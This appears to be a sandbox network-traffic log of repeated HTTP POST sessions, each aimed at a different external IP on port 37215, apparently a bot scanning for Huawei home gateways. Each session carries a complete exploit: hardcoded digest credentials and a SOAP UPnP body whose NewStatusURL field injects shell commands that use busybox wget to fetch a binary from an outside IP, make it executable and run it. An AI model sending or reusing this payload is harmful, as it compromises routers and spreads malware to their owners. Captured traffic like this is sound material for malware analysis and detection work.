                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1049192.168.2.153321841.202.93.10137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912554026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1050192.168.2.153399241.249.56.17937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912595034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1051192.168.2.156006641.213.175.237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912595987 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1052192.168.2.153611641.192.136.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912599087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1053192.168.2.155083041.60.4.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912600994 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1054192.168.2.155372041.95.250.9837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912667990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1055192.168.2.153766041.190.146.4237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912667990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1056192.168.2.155702241.166.21.3037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912744999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1057192.168.2.155687641.115.106.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912748098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1058192.168.2.155716441.82.64.137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.912748098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
